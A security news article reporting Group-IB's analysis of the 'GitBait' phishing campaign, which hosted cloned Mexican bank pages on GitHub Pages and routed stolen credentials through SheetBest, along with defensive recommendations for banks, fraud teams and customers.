“GitBait” has targeted customers of at least 12 Mexican financial institutions over roughly three years, using more than 100 GitHub-hosted domains and no traditional server infrastructure, according to new analysis from Group-IB.
GitBait’s footprint on GitHub and cloud services
Group-IB says the campaign operated without a dedicated backend, hosting cloned bank pages on GitHub Pages and routing stolen credentials through SheetBest — a legitimate service that writes data directly into Google Sheets. The firm counted more than 100 GitHub-hosted domains tied to the operation and reported all of them to GitHub. By relying on trusted cloud domains and third‑party services, the campaign left little in the way of infrastructure for investigators to seize.
How the kit captured credentials and hid in plain sight
Victims were presented with pages that closely cloned the branding of targeted banks. The pages contained forms that captured usernames, customer IDs, passwords and card details. A client-side script collected those entries, sent them to SheetBest, and then presented a fake verification screen to maintain the illusion of a legitimate transaction. Group-IB could not confirm the lure used to get victims to the sites, but the pages included crafted Open Graph tags that produced convincing, bank-branded preview cards when links were shared over WhatsApp, Telegram or SMS. The sites also used a noindex tag to keep themselves out of search engine results.
Modularity, automation, and operational tradecraft
At the heart of the operation was a modular phishing kit with an operator panel that supported desktop and mobile templates. Group-IB found that each GitHub repository contained duplicated pages so an individual page removal could be redeployed quickly. Commit records on one repository showed 66 commits, indicating active upkeep; three contributor accounts (some sharing an email address); automated publishing via Jekyll and GitHub Actions; and an endpoint rotation performed by an operator account that remained active at the time of Group-IB’s analysis.
The pages also referenced obfuscated JavaScript hosted at randomized paths. That design let operators swap payloads without changing the visible page HTML and frustrated static analysis approaches that rely on scanning fixed paths or persistent payload fingerprints.
Why traditional protections can miss serverless phishing
Group-IB framed GitBait as part of a broader shift in which criminals leverage everyday cloud services and ready-made kits instead of custom malware and self‑hosted servers — a trend that echoes the recent rise of phishing-as-a-service platforms. Because pages were served from trusted domains (GitHub Pages) and data exfiltration used legitimate services (SheetBest into Google Sheets), blocklists of known-bad sites provide limited protection. Group-IB warned that reliance on domain reputation or static blocklists alone will likely miss operations that live on high‑reputation cloud platforms.
What this means for Mexican banks, security teams, and customers
- Mexican banks: watch for brand abuse on GitHub Pages and similar hosting platforms, and monitor for cloned Open Graph metadata that could enable believable link previews on messaging apps.
- Security and fraud teams: flag unexpected traffic to services like SheetBest and other cloud-based data sinks, prioritize behavioral detection over simple domain-blocking, and review automation pipelines that might be exploited by rapid redeployment tactics.
- Customers and account holders: be aware that convincing, bank‑branded preview cards in messaging apps can accompany phishing links; multi‑factor authentication and transaction alerts were specifically recommended by Group-IB as mitigations.
Group-IB’s findings show a criminal calculus built on operational efficiency: host pages where takedown is slow or fragmented, send harvested data through legitimate platforms that are unlikely to be blocked, and automate redeployment so removals are a temporary inconvenience. The firm reported the discovered domains to GitHub and urged banks to shift defensive effort from static blocklists to active monitoring for brand abuse and anomalous traffic to cloud services such as SheetBest.
The case raises a pointed question for defenders: when threat actors can build fully functional phishing backends with no dedicated servers, how should defenders prioritize detections and takedowns across the cloud platforms those actors exploit? Group-IB’s reporting offers a practical starting point — watch GitHub for brand impersonation, flag unexpected SheetBest activity, and assume that trusted domains are not always trustworthy.
https://www.infosecurity-magazine.com/news/gitbait-github-pages-sheetbest/
